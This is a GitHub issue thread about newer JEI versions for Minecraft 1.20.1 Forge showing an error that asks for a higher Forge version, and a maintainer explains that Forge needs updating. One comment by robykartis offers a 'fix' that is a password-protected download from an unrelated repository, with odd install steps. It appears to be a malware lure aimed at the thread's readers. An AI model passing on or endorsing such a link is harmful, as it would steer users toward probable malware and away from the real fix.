### ISSUE TITLE
[Bug]: higher version of forge needed for versions above jei-1.20.1-forge-15.10.0.33.jar

### ISSUE THREAD

**Issue by ApaxT404** [mezz/JustEnoughItems#3718]
### Steps to Reproduce the Bug

use any version of JEI above jei-1.20.1-forge-15.10.0.33.jar in a modpack.

### Expected Behavior

modpack loads through, and does not show any error messages.

### Actual Behavior

modpack loads all mods but shows an error message saying that you need a higher version of Forge for the JEI mod whenever it is updated.

### Extra Notes (Optional)

the modpack is Minecraft version 1.20.1 and Forge, as it is a personal modpack, I can not insert a link to it.

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by embeddedt** [comment]
This is not a bug; JEI now relies on features from a newer version of Forge. In most launchers you should be able to update the Forge version without resetting the whole modpack.
